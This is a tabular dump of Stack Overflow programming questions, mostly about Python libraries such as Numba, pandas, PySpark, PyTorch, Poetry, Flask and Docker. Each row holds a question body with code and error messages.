QuestionId
int64 74.8M
79.8M
| UserId
int64 56
29.4M
| QuestionTitle
stringlengths 15
150
| QuestionBody
stringlengths 40
40.3k
| Tags
stringlengths 8
101
| CreationDate
stringdate 2022-12-10 09:42:47
2025-11-01 19:08:18
| AnswerCount
int64 0
44
| UserExpertiseLevel
int64 301
888k
| UserDisplayName
stringlengths 3
30
⌀ |
|---|---|---|---|---|---|---|---|---|
76,307,173
| 7,509,907
|
Getting 'unsupported array index type unicode_type' error when selecting a column based on condition in Numba with NumPy structured array
|
<p>I am trying to select a column of a structured NumPy array. The column to be selected depends on a condition that will be passed to the function. Numba throws the error below when I try to select the column name based on the condition. Otherwise everything works well.</p>
<p>Basic example:<br />
This works:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
import numba
@numba.njit(fastmath=True, cache=True)
def fun(a, b=0):
c = 'name'
#if b:
# c = 'age'
return a[c]
a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])
fun(a)
</code></pre>
<p>This doesn't work:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
import numba
@numba.njit(fastmath=True, cache=True)
def fun(a, b=0):
c = 'name'
if b:
c = 'age'
return a[c]
a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])
fun(a)
</code></pre>
<p>The error:</p>
<pre><code>---------------------------------------------------------------------------
TypingError Traceback (most recent call last)
c:\Users\User\Workspaces\temp.ipynb Cell 9 in ()
8 return a[c]
10 a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
11 dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])
---> 13 fun(a)
File ~\AppData\Roaming\Python\Python38\site-packages\numba\core\dispatcher.py:468, in _DispatcherBase._compile_for_args(self, *args, **kws)
464 msg = (f"{str(e).rstrip()} \n\nThis error may have been caused "
465 f"by the following argument(s):\n{args_str}\n")
466 e.patch_message(msg)
--> 468 error_rewrite(e, 'typing')
469 except errors.UnsupportedError as e:
470 # Something unsupported is present in the user code, add help info
471 error_rewrite(e, 'unsupported_error')
File ~\AppData\Roaming\Python\Python38\site-packages\numba\core\dispatcher.py:409, in _DispatcherBase._compile_for_args..error_rewrite(e, issue_type)
407 raise e
408 else:
--> 409 raise e.with_traceback(None)
TypingError: Failed in nopython mode pipeline (step: nopython frontend)
No implementation of function Function() found for signature:
>>> getitem(unaligned array(Record(name[type=[unichr x 10];offset=0],age[type=int32;offset=40],weight[type=float32;offset=44];48;False), 1d, C), unicode_type)
There are 22 candidate implementations:
- Of which 20 did not match due to:
Overload of function 'getitem': File: : Line N/A.
With argument(s): '(unaligned array(Record(name[type=[unichr x 10];offset=0],age[type=int32;offset=40],weight[type=float32;offset=44];48;False), 1d, C), unicode_type)':
No match.
- Of which 2 did not match due to:
Overload in function 'GetItemBuffer.generic': File: numba\core\typing\arraydecl.py: Line 166.
With argument(s): '(unaligned array(Record(name[type=[unichr x 10];offset=0],age[type=int32;offset=40],weight[type=float32;offset=44];48;False), 1d, C), unicode_type)':
Rejected as the implementation raised a specific error:
NumbaTypeError: unsupported array index type unicode_type in [unicode_type]
raised from C:\Users\User\AppData\Roaming\Python\Python38\site-packages\numba\core\typing\arraydecl.py:72
During: typing of intrinsic-call at C:\Users\User\AppData\Local\Temp\ipykernel_37200\1621110578.py (8)
File "..\..\..\..\..\AppData\Local\Temp\ipykernel_37200\1621110578.py", line 8:
</code></pre>
|
<python><numpy><numba><structured-array>
|
2023-05-22 14:22:02
| 1
| 950
|
D.Manasreh
|
76,307,108
| 1,841,839
|
How to set page size with account summitries list in Google analytics admin api
|
<p>The <a href="https://developers.google.com/analytics/devguides/config/admin/v1/rest/v1beta/accountSummaries/list?apix_params=%7B%22pageSize%22%3A1%7D" rel="nofollow noreferrer">Method: accountSummaries.list</a> method has an optional parm called page size</p>
<blockquote>
<p>pageSize integer</p>
<p>The maximum number of AccountSummary resources to return. The service may return fewer than this value, even if there are additional pages. If unspecified, at most 50 resources will be returned. The maximum value is 200; (higher values will be coerced to the maximum)</p>
</blockquote>
<p>In the following example if i dont set page size then the code runs and get all the rows. However if i do set page size then I get an error that this option does not exist</p>
<pre><code>from google.analytics.admin import AnalyticsAdminServiceClient
# pip install google-analytics-admin
CREDENTIALS_FILE_PATH = 'C:\credentials.json'
from google_auth_oauthlib import flow
def list_accounts(credentials=None):
"""
Lists the available Google Analytics accounts.
Args:
"""
# Using a default constructor instructs the client to use the credentials
# specified in GOOGLE_APPLICATION_CREDENTIALS environment variable.
client = AnalyticsAdminServiceClient(credentials=credentials)
# Make the request
results = client.list_account_summaries(page_size = 1) # ERROR HERE
# Displays the configuration information for all Google Analytics accounts
# available to the authenticated user.
print("Result:")
for account in results:
print(account)
def get_credentials():
"""Creates an OAuth2 credentials instance."""
appflow = flow.InstalledAppFlow.from_client_secrets_file(
CREDENTIALS_FILE_PATH,
scopes=["https://www.googleapis.com/auth/analytics.readonly"],
)
# TODO(developer): Update the line below to set the `launch_browser` variable.
# The `launch_browser` boolean variable indicates if a local server is used
# as the callback URL in the auth flow. A value of `True` is recommended,
# but a local server does not work if accessing the application remotely,
# such as over SSH or from a remote Jupyter notebook.
launch_browser = True
if launch_browser:
appflow.run_local_server()
else:
# note yes this is deprecated. It will work if you change the redirect uri in the url given you from urn:ietf:wg:oauth:2.0:oob
# to http://127.0.0.1 The client library team needs to fix this.
appflow.run_console()
return appflow.credentials
def main():
credentials = get_credentials()
list_accounts(credentials)
if __name__ == "__main__":
main()
</code></pre>
<blockquote>
<p>TypeError: list_account_summaries() got an unexpected keyword argument 'page_size'</p>
</blockquote>
<p>I have tried pagesize, page_size, pageSize nothing seems to work I have also dug around in the github project and it seems it should be page_size but its not working.</p>
<h1>Note on Alpha and beta versions.</h1>
<p>alpha and beta versions apear to have allowed for</p>
<pre><code>request = client.ListAccountSummariesRequest()
request.page_size = 1
results = client.list_account_summaries(request)
</code></pre>
<p>with the full version this results in</p>
<blockquote>
<p>AttributeError: 'AnalyticsAdminServiceClient' object has no attribute 'ListAccountSummariesRequest'</p>
</blockquote>
|
<python><google-cloud-platform><google-api><google-analytics-api><google-api-python-client>
|
2023-05-22 14:15:30
| 1
| 118,263
|
Linda Lawton - DaImTo
|
76,307,021
| 6,564,294
|
Shuffle pandas column while avoiding a condition
|
<p>I have a dataframe that shows 2 sentences are similar. This dataframe has a 3rd relationship column which also contains some strings. This 3rd column shows how similar the texts are. For instance: <br>
P for Plant, V for Vegetables and F for Fruits. Also, <br>
A for Animal, I for Insects and M for Mammals.</p>
<pre><code>data = {'Text1': ["All Vegetables are Plants",
"Cows are happy",
"Butterflies are really beautiful",
"I enjoy Mangoes",
"Vegetables are green"],
'Text2': ['Some Plants are good Vegetables',
'Cows are enjoying',
'Beautiful butterflies are delightful to watch',
'Mango pleases me',
'Spinach is green'],
'Relationship': ['PV123', 'AM4355', 'AI784', 'PF897', 'PV776']}
df = pd.DataFrame(data)
print(df)
>>>
</code></pre>
<div class="s-table-container">
<table class="s-table">
<thead>
<tr>
<th style="text-align: right;"></th>
<th style="text-align: left;">Text1</th>
<th style="text-align: left;">Text2</th>
<th style="text-align: left;">Relationship</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: right;">0</td>
<td style="text-align: left;">All Vegetables are Plants</td>
<td style="text-align: left;">Some Plants are good Vegetables</td>
<td style="text-align: left;">PV123</td>
</tr>
<tr>
<td style="text-align: right;">1</td>
<td style="text-align: left;">Cows eat grass</td>
<td style="text-align: left;">Grasses are cow's food</td>
<td style="text-align: left;">AM4355</td>
</tr>
<tr>
<td style="text-align: right;">2</td>
<td style="text-align: left;">Butterflies are really beautiful</td>
<td style="text-align: left;">Beautiful butterflies are delightful to watch</td>
<td style="text-align: left;">AI784</td>
</tr>
<tr>
<td style="text-align: right;">3</td>
<td style="text-align: left;">I enjoy Mangoes</td>
<td style="text-align: left;">Mango pleaases me</td>
<td style="text-align: left;">PF897</td>
</tr>
<tr>
<td style="text-align: right;">4</td>
<td style="text-align: left;">Vegetables are green</td>
<td style="text-align: left;">Spinach is green</td>
<td style="text-align: left;">PV776</td>
</tr>
</tbody>
</table>
</div>
<p>I desire to train a BERT model on this data. However, I also need to create examples of dissimilar sentences. My solution is to give a label of 1 to the dataset as it is and then shuffle <code>Text2</code> and give it a label of 0. The problem is that I can't really create good dissimilar examples just by random shuffling without making use of the "Relationship" column.</p>
<p>How can I shuffle my data so I can avoid texts like <code>All Vegetables are Plants</code> and <code>Spinach is green</code> appearing on the same row on <code>Text1</code> and <code>Text2</code> respectively?</p>
|
<python><pandas><dataframe><shuffle><sentence-similarity>
|
2023-05-22 14:05:06
| 2
| 324
|
Chukwudi
|
76,307,018
| 4,858,605
|
Integrating custom pytorch backend with triton + AWS sagemaker
|
<p>I have a custom python backend that works well with AWS sagemaker MMS (multimodel server) using an S3 model repository. I want to adapt this backend to work with Triton python backend.
I have a example dockerfile that runs the triton server with my requirements.</p>
<p>I also have a model_handler.py file that is based on <a href="https://github.com/triton-inference-server/python_backend/blob/main/examples/pytorch/model.py" rel="nofollow noreferrer">this example</a>, but I do not understand where to place this file to test it's functionality. Using classic sagemaker with MMS for example, I would import the handler in the dockerd-entrypoint.</p>
<p>However with triton, I do not understand where this file should be imported. I understand I can use pytriton, but there is absolutely no documentation that I can comprehend. Can someone point me in the right direction please?</p>
|
<python><amazon-web-services><amazon-sagemaker><triton>
|
2023-05-22 14:04:48
| 1
| 2,462
|
toing_toing
|
76,306,898
| 1,504,016
|
Dynamically define class with inheritance and static attributes (sqlmodel / sqlalchemy metaclasses)
|
<p>I have the following class definition that I would like to make dynamic:</p>
<pre><code>class SQLModel_custom(SQLModel, registry=self.mapper_registry):
metadata = MetaData(schema=self.schema)
</code></pre>
<p>I've tried something like that:</p>
<pre><code>type('SQLModel_custom', (SQLModel, self.mapper_registry), {'metadata': MetaData(schema=self.schema)})
</code></pre>
<p>But this give me the following error:</p>
<pre><code>TypeError: metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases
</code></pre>
<p>Maybe the issue comes from the fact I'm not using <code>registry=</code> when defining parent classes in the dynamic version, but I don't see how I could acheive the same result.
Any advice? Thank you!</p>
|
<python><class><dynamic><metaclass><sqlmodel>
|
2023-05-22 13:51:40
| 1
| 2,649
|
ibi0tux
|
76,306,842
| 3,521,180
|
Why am I not able to pass two status Ids in my GET method?
|
<p>I have a scenario where in I need to compare two simulation coming from same table, i.e say simulation_1 and simulation_2. For all completed simulation theer would be a unique id generated "sim_sttus_id" in the "__TABLE1" as shown in the code snippet. Below are the code snippet for reference.</p>
<pre><code>class SimRes:
__TABLE1 = 'SIM_STTUS'
__TABLE2 = 'COMP_SIM_CONF'
__TABLE3 = 'COMP'
def __init__(self, prog: str, plan: int, versn: float, sim_sttus: int, tab_name: str = None, comp_id: int = None):
super().__init__(prog)
self.__prog = prog
self.__plan = plan
self.__versn = versn
self.__sim_sttus = sim_sttus
self.__tab_name = tab_name
self.__comp_id = comp_id
self.__sim_sttus_tbl = Table(f'{self.schema_name}.{self.__TABLE1}')
self.__comp_sim_conf_tbl = Table(f'{self.schema_name}.{self.__TABLE2}')
self.__comp_tbl = Table(f'{self.schema_name}.{self.__TABLE3}')
def get_select_comp(self):
try:
SSD = self.__sim_sttus_tbl
CSCD = self.__comp_sim_conf_tbl
ICD = self.__comp_tbl
query = SnowflakeQuery.from_(CSCD) \
.join(SSD).on_field('PLAN_SIM_CONF_ID') \
.join(ICD).on_field('COMP_ID') \
.select(CSCD.COMP_SIM_CONF_ID, SSD.sim_sttus_id, CSCD.PLAN_SIM_CONF_ID, \
CSCD.COMP_ID, ICD.COMP_NAME) \
.where(Criterion.all([SSD.sim_sttus_id == self.sim_sttus_id])) \
.get_sql()
comp_lst = self.execute_query(query)
if isinstance(component_lists['result'], str):
raise QueryException(component_lists)
return comp_lst["result"]
except Exception as e:
raise
</code></pre>
<p>My challenge lies in the below function where I need to compare</p>
<pre><code> def compare_sim_sttus(self, sttus_id1, sttus_id2):
try:
selected_comp = self.get_select_comp()
matching_comp = []
for component in selected_components:
if component['sim_sttus_id'] == sttus_id1:
comp_id = component['comp_id']
comp_name = component['comp_name']
if self.__check_component_status(comp_id, sttus_id2):
matching_comp.append((comp_id, comp_name))
return matching_comp
except Exception as e:
raise
def __check_comp_sttus(self, comp_id, sttus_id):
try:
query = SnowflakeQuery \
.from_(self.__sim_sttus_tbl) \
.where(self.__sim_sttus_tbl.sim_sttus_id == sttus_id) \
.where(self.__comp_tbl.COMP_ID == comp_id) \
.get_sql()
comp_sttus = self.execute_query(query)
return len(comp_sttus['result']) > 0
except Exception as e:
raise
</code></pre>
<ul>
<li><p>"<code>get_select_comp</code>" method is using PyPika query to get list of <code>comp_name</code> and <code>comp_id</code> based on <code>sim_sttus_id</code>. Its working as per the method requirement.</p>
</li>
<li><p><code>compare_sim_sttus</code> which internally calls the existing "get_select_comp" method to retrieve the list of selected components. Then, we iterate over each component and check if its sim_sttus_id matches sttus_id1. If it does, we retrieve the comp_id and comp_name and call the "check_comp_sttus" method to verify if the same comp_id exists for sttus_id2. If it does, we add the component to the matching_components list.</p>
</li>
</ul>
<p>Below is the below endpoint code.</p>
<pre><code>import traceback
from flasgger import swag_from
from flask_restful import Resource
from pathlib import Path
from <path_to_module import SimRes
__all__ = ['SimRes']
class SimResResource(Resource):
@classmethod
def get(cls, prog: str, plan: int, versn: float, sim_sttus_id: int):
try:
sttus_id1 = 1 # Set the first sim_sttus_id
sttus_id2 = 2 # Set the second sim_sttus_id
components_compare = SimRes(prog=prog, plan=plan, versn=versn, sim_sttus_id=sim_sttus_id)
response = components_compare.compare_sim_sttus(sttus_id1, sttus_id2)
return success_response(response)
except Exception as e:
app.logger.error(f'{str(e)}: {traceback.format_exc()}')
return error_response(e)
</code></pre>
<p>As you can see that in the above GET method I have passed the values for <code>sttus_id1</code> and <code>status_id2</code> which is hard coded. But I need to execute the API in POSTMAN, and I wanted to pass the sttus_id1 and sttus_id2 in the POSTMAN API and get the response.</p>
<p>below would be the endpoint route</p>
<pre><code>/programs/<prog>/plans/<plan>/<versn>/sim_compare.
</code></pre>
<p>I am not able to figure out how to do that in my endpoint. I couldn't pass <code>"sim_sttus_id"</code> twice in my endpoint path, as it is giving me error saying <code>"identical col name"</code> and when I am passing <code><sttus_id1>/<sttus_id2></code> in the endpoint path, I am getting below error.</p>
<pre><code>{
"error": "__init__() got an unexpected keyword argument 'sttus_id1'",
"success": false
}
</code></pre>
<p>So, I tried adding those two variables sttus_id1, and sttus_id2 in the class constructor, and removed them as a parameters from the <code>compare_sim_sttus</code> method and call them with "self" at the required positions. In the endpoint class I added them as parameters in the GET method, but no help. As, when I did, I am getting below error</p>
<pre><code> "error": "__init__() missing 1 required positional argument: 'sim_sttus_id'",
"success": false
}
</code></pre>
<p>modified endpoint path <code>/programs/<prog_id>/plans/<plan>/<versn>/<sttus_id1>/<sttus_id2>/sim_compare</code>
I cannot pass sim_sttus_id in the endpoint as said earlier. Kindly suggest</p>
|
<python><python-3.x><flask><flask-restful><pypika>
|
2023-05-22 13:45:23
| 0
| 1,150
|
user3521180
|
76,306,463
| 20,726,966
|
How can I deploy a Python script to Heroku for performing dynamic sum, division and multiplication on-demand?
|
<p>I am trying to deploy a script to Heroku that for example, returns a sum, division and multiplication of two numbers that are dynamically passed.</p>
<p>script.py</p>
<pre><code>def sum(a, b):
ans = a+b
print(ans)
return ans
def mul(a, b):
ans = a*b
print(ans)
return ans
def div(a, b):
ans = a/b
print(ans)
return ans
</code></pre>
<p>I would like this script to be called on demand and also specify the function that I would like to call by passing the parameters. I am fairly new to Heroku so any advice is a plus. Is this possible in Heroku? If not, what other platforms should I be looking at?</p>
|
<python><heroku>
|
2023-05-22 13:00:00
| 1
| 318
|
Homit Dalia
|
76,306,376
| 9,488,023
|
Compare similar spelling in Pandas dataframe column but different value in another column
|
<p>Let's say I have a Pandas dataframe in Python that looks something like this:</p>
<pre><code>df_test = pd.DataFrame(data=None, columns=['file', 'number'])
df_test.file = ['washington_142', 'washington_287', 'chicago_453', 'chicago_221', 'chicago_345', 'seattle_976', 'seattle_977', 'boston_367', 'boston 098']
df_test.number = [20, 21, 33, 34, 33, 45, 45, 52, 52]
</code></pre>
<p>What I want to find out from this dataset are those strings in 'file' that start with the same exact letters (maybe 50% of the string at least), but that do not have the same corresponding value in the 'number' column. In this example, it means I would want to create a new dataframe that finds:</p>
<pre><code>'washington_142', 'washington_287', 'chicago_453', 'chicago_221', 'chicago_345'
</code></pre>
<p>But none of the others since they have the same 'number' when the spelling starts with the same string. I know there is a function 'difflib.get_close_matches' but I am not sure how to implement it to check with the other column in the dataframe. Any advice or help is really appreciated!</p>
|
<python><pandas><dataframe><compare>
|
2023-05-22 12:49:44
| 2
| 423
|
Marcus K.
|
76,306,172
| 2,928,970
|
Create numpy array reusing memory of other array
|
<p>I have following code:</p>
<pre><code>a = np.zeros(N)
b = np.tile(a, [m, n])
....
a[4] = 5 # just changing some values inside a
b = np.tile(a, [m, n])
</code></pre>
<p>In the second assignment for <code>b</code>, can the previous memory of <code>b</code> be overwritten during this procedure instead of creating a new array then assigning to <code>b</code>? I understand that memory of previous <code>b</code> will be garbage collected soon afterwards but I want to implement it in more performant way since <code>N</code>, <code>m</code>, <code>n</code> can be large in my use case.</p>
|
<python><numpy><memory-management>
|
2023-05-22 12:23:51
| 2
| 1,395
|
hovnatan
|
76,306,121
| 2,473,382
|
Poetry: build a package with a non-standard directory structure
|
<p>I created a repo with this non-standard structure:</p>
<pre><code>- src
- resources
-- a.py
-- b.py ...
</code></pre>
<p>I want to make a package out of it (let's call it <code>pack</code>).</p>
<p>In my pyproject.toml, the relevant lines are:</p>
<pre class="lang-ini prettyprint-override"><code>[tool.poetry]
name = "pack"
include=[{include="src"}]
</code></pre>
<p>Then after a <code>pip install</code> everything is installed under src. Using it would mean <code>from src import ...</code> not <code>from pack import ...</code>.</p>
<p>If I follow the standard tree (everything under src/pack), then it works as expected.</p>
<p><strong>Question</strong></p>
<p>Is there a way, with my tree, to have the package built so as <code>from pack import ...</code> works?</p>
|
<python><python-packaging><python-poetry>
|
2023-05-22 12:18:16
| 1
| 3,081
|
Guillaume
|
76,306,118
| 10,164,750
|
Dropping a column based on the value of another pyspark
|
<p>I am trying to build and a method which takes a dataframe as input and returns the another dataframe as output after checking a certain condition.</p>
<p>If the <code>exception_type</code> column contains <code>FILE_REJECT</code>, it <code>drops</code> the <code>file_name</code> column, otherwise it does not.</p>
<p>I have provided various input and output to the method. Please help me build the method. Thank you.</p>
<pre><code>Input
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAW0001| SUSPENSE|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0006| REC_REJECT|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| | |
+------------+---------------+-------------+----------------+---------+--------------+--------------+
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| | |
|KKAR0523.ccn| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0002| FILE_REJECT|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
</code></pre>
<pre><code>Output
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAW0001| SUSPENSE|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0006| REC_REJECT|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| | |
+------------+---------------+-------------+----------------+---------+--------------+--------------+
+---------------+-------------+----------------+---------+--------------+--------------+
|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+---------------+-------------+----------------+---------+--------------+--------------+
| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| | |
| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+---------------+-------------+----------------+---------+--------------+--------------+
+---------------+-------------+----------------+---------+--------------+--------------+
|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+---------------+-------------+----------------+---------+--------------+--------------+
| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0002| FILE_REJECT|
| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+---------------+-------------+----------------+---------+--------------+--------------+
</code></pre>
<p>Thank you.</p>
|
<python><apache-spark><pyspark>
|
2023-05-22 12:18:01
| 1
| 331
|
SDS
|
76,306,096
| 12,633,371
|
polars use Expression API with DataFrame's rows
|
<p>I am a new <code>polars</code> user and I want to apply a function in every <code>polars DataFrame</code> row. In <code>pandas</code> I would use the <code>apply</code> function specifying that the input of the function is the <code>DataFrame</code>'s row instead of the <code>DataFrame</code>'s column(s).</p>
<p>I saw the <code>apply</code> function of polars library, and it says that it is preferable, because it is much more efficient, to use the Expression API instead of the <code>apply</code> function on a polars <code>DataFrame</code>. The documentation has examples of the Expression API with the <code>select</code> function, but <code>select</code> is used with the <code>DataFrames</code>'s columns. Is there a way to use the Expression API with the rows of the <code>DataFrame</code>?</p>
<p><strong>Edit for providing an example</strong></p>
<p>I have a <code>DataFrame</code> with this structure</p>
<pre><code>l=[(1,2,3,4,22,23,None,None),(5,6,8,10,None,None,None,None)]
df=pl.DataFrame(data=l, orient='row')
</code></pre>
<p>i.e. a <code>DataFrame</code> that at some point and until the end, a row has <code>None</code> values. In this example, in the first row the <code>None</code> values start at column 6, while in the second, the <code>None</code> values start at column 4.</p>
<p>What I want to do is to find the most efficient polars way to turn this <code>DataFrame</code> into a <code>DataFrame</code> with only three columns, where the first column is the first element of the row, the second column is the second element of the row, and the third will have as a list all the other elements of the following columns that are not <code>None</code>.</p>
|
<python><dataframe><python-polars>
|
2023-05-22 12:15:13
| 1
| 603
|
exch_cmmnt_memb
|
76,306,054
| 10,532,894
|
PytestUnhandledCoroutineWarning: async def functions are not natively supported and have been skipped
|
<p>I'm building a py project using <code>poetry</code>
I have created a test file and using following code from examples to test asynchronously</p>
<pre><code>
import httpx
import respx
@respx.mock
async def test_async_decorator():
async with httpx.AsyncClient() as client:
route = respx.get("https://example.org/")
response = await client.get("https://example.org/")
assert route.called
assert response.status_code == 200
</code></pre>
<p>When I run <code>poetry run pytest</code> or simply <code>pytest</code>, I'm getting following warning</p>
<pre><code>
test_gsx.py::test_async_decorator
/Users/krishna/Library/Caches/pypoetry/virtualenvs/geoserverx-Yc0Bl2cH-py3.11/lib/python3.11/site-packages/_pytest/python.py:183: PytestUnhandledCoroutineWarning: async def functions are not natively supported and have been skipped.
You need to install a suitable plugin for your async framework, for example:
- anyio
- pytest-asyncio
- pytest-tornasync
- pytest-trio
- pytest-twisted
warnings.warn(PytestUnhandledCoroutineWarning(msg.format(nodeid)))
-- Docs: https://docs.pytest.org/en/stable/how-to/capture-warnings.html
</code></pre>
<p>my pyproject.toml file has following</p>
<pre><code>
[tool.poetry.group.dev.dependencies]
pytest = "^7.1.2"
respx = "^0.20.1"
mypy = "^0.960"
black = "^22.3.0"
isort = "^5.10.1"
pytest-asyncio = "^0.21.0"
anyio = {extras = ["trio"], version = "^3.3.4"}
</code></pre>
|
<python><asynchronous><pytest><python-poetry>
|
2023-05-22 12:09:41
| 2
| 461
|
krishna lodha
|
76,305,881
| 14,125,436
|
How to set multi-conditions in an If statement for a pytorch tensor
|
<p>I have a pytorch tensor and want to mask part of it and put the masked section in an if statement. This is my tensor:</p>
<pre><code>import torch
all_data = torch.tensor([[1.1, 0.4],
[1.7, 2.7],
[0.9, 0.7],
[0.9, 3.5],
[0.1, 0.5]])
if [(all_data[:,0]<1) & (all_data[:,1]<1)]: # I have two conditions
print ('Masked')
else:
print('Not_Masked')
</code></pre>
<p>this piece of code is not working correctly because it prints the whole tensor while I want to check the tensor row by row: the first and second rows do not fulfill the condition and I want to print <code>Not_Masked</code>. The third row fulfills and I wan to have <code>Masked</code> printed. It should go so on and so forth.
I appreciate any help.</p>
|
<python><if-statement><pytorch><conditional-statements>
|
2023-05-22 11:51:37
| 1
| 1,081
|
Link_tester
|
76,305,701
| 3,740,652
|
Python app passing config file trhough Docker
|
<p>I created a stand-alone application with Python3 that accepts a file as input, however I am not able to let it work properly.
Once installed on my system I run the application as <code>myapp -accounts ./accounts.yaml</code>.</p>
<p>Now, I am trying to replicate this behaviour on a Docker container: I would like to do something like <code>docker run --name myapp myapplatest -accounts ./accounts.yaml</code> where the file <code>accounts.yaml</code> is stored in the local folder. However, I am still receiving this error:</p>
<pre class="lang-bash prettyprint-override"><code>Traceback (most recent call last):
File "/usr/local/bin/myapp", line 8, in <module>
sys.exit(main())
File "/usr/local/lib/python3.7/dist-packages/myapp/main.py", line 17, in main
with open(args.accounts, "r") as acc:
FileNotFoundError: [Errno 2] No such file or directory: '/usr/local/lib/python3.7/dist-packages/myapp/accounts.yaml'
</code></pre>
<hr />
<p>Here it is the latest part of the <code>Dockerfile</code> I created for the app</p>
<pre><code>RUN mkdir /home/myapp
WORKDIR /home/myapp
RUN apt install -y python3-pip
COPY . .
RUN python3 -m pip install --upgrade pip
RUN python3 -m pip install -r requirements.txt
RUN python3 -m pip install .
ENTRYPOINT ["myapp"] CMD[""]
</code></pre>
<p>The <code>cli.py</code> used to catch the args is</p>
<pre class="lang-py prettyprint-override"><code>def full_path(string: str):
script_dir = os.path.dirname(__file__)
return os.path.normpath(os.path.join(script_dir, string))
def myapp_args(parser: argparse.ArgumentParser):
parser.add_argument("-accounts", type=full_path, default="../accounts.yaml",
help="Specify the Yaml file containing the accounts information")
return parser.parse_args()
</code></pre>
<p>The <code>main.py</code> just calls the parser</p>
<pre class="lang-py prettyprint-override"><code>def main():
parser = argparse.ArgumentParser()
args = myapp_args(parser)
with open(args.accounts, "r") as acc:
accounts = yaml.safe_load(acc)
</code></pre>
<p>The <code>setup.py</code> contains the following line of code to install correctly the package</p>
<pre class="lang-py prettyprint-override"><code> include_package_data=True,
entry_points={
'console_scripts': [
'myapp = myapp.main:main',
],
},
</code></pre>
<hr />
<p>I tried to run docker sharing a folder that contains the file <code>accounts.yaml</code> but with no success
<code>docker run --name myapp --mount type=bind,source="$(pwd)"/accounts.yaml,target=/home/myapp/accounts.yml myapp:latest -accounts ./accounts.yaml</code>
But I always have the same error.
What could it be? I do not understand why it looks for the file in the <code>/usr/lib...</code> while I am calling the command in the <code>WORKDIR</code>.</p>
<h1>EDIT</h1>
<p>I think to have misexplained the question. I have no problems passing the file into the container. If I enter into it and list the files, the <code>account.yaml</code> is there, in the project root:</p>
<pre class="lang-bash prettyprint-override"><code> docker run --name myapp -it --entrypoint sh --mount type=bind,source="$(pwd)"/accounts.yaml,target=/home/myapp/accounts.yaml myapp:latest
# ls
Dockerfile README.md myapp myapp.png requirements.txt sonar-project.properties
MANIFEST.in accounts.yaml setup.py
# exit
</code></pre>
<p>However, the error is the first one I posted in the questions: the program looks for the file in the <code>/usr/local/lib...</code> rather than the project root where it is invoked.</p>
|
<python><docker><parameter-passing><docker-entrypoint>
|
2023-05-22 11:29:00
| 0
| 372
|
net_programmer
|
76,305,700
| 11,974,163
|
How to extract values from excel worksheets to get desired calculation using python
|
<p>So I have 3 worksheets in excel, let's call them <code>sheet_a</code>, <code>sheet_b</code> and <code>sheet_c</code>.</p>
<pre><code>sheet_a:
type formula
0 type_a A+B
1 type_b A
2 type_c A/(A+B)
3 type_d A/B
sheet_b:
dish ingredient map
0 type_a fish B
1 type_a potato A
2 type_b bread A
3 type_c chocolate B
4 type_c carrot A
5 type_d potato A
6 type_d orange B
sheet_c:
ingredient cost
0 fish 1
1 bread 3
2 carrot 2
3 potato 6
4 orange 2
</code></pre>
<p>What I'm finding tricky is trying to get the cost values, given the cost forumla in <code>sheet_a</code>, mapping values in <code>sheet_b</code> and then cost values in <code>sheet_c</code>.</p>
<p>So for example to get the cost value for <code>type_a</code>:</p>
<pre><code>type_a:
>>> A+B
>>> potato + fish
>>> 6 + 1
7
</code></pre>
<p>What I want is an output list of values in the same order as they appear in <code>sheet_a</code>; <code>type_a</code>, <code>type_b</code>, <code>type_c</code> and <code>type_d</code>.</p>
<p>Expected output:</p>
<p><code>[7, 3, NaN, 3]</code> - <code>NaN</code> because chocolate has no value in <code>sheet_c</code>.</p>
<p>So far I haven't been able to get the desired output I've managed to get up to a stage where I have a dictionary with keys as the type and values as a list of A and B combinations</p>
|
<python><excel><oop><openpyxl>
|
2023-05-22 11:28:57
| 1
| 457
|
pragmatic learner
|
76,305,685
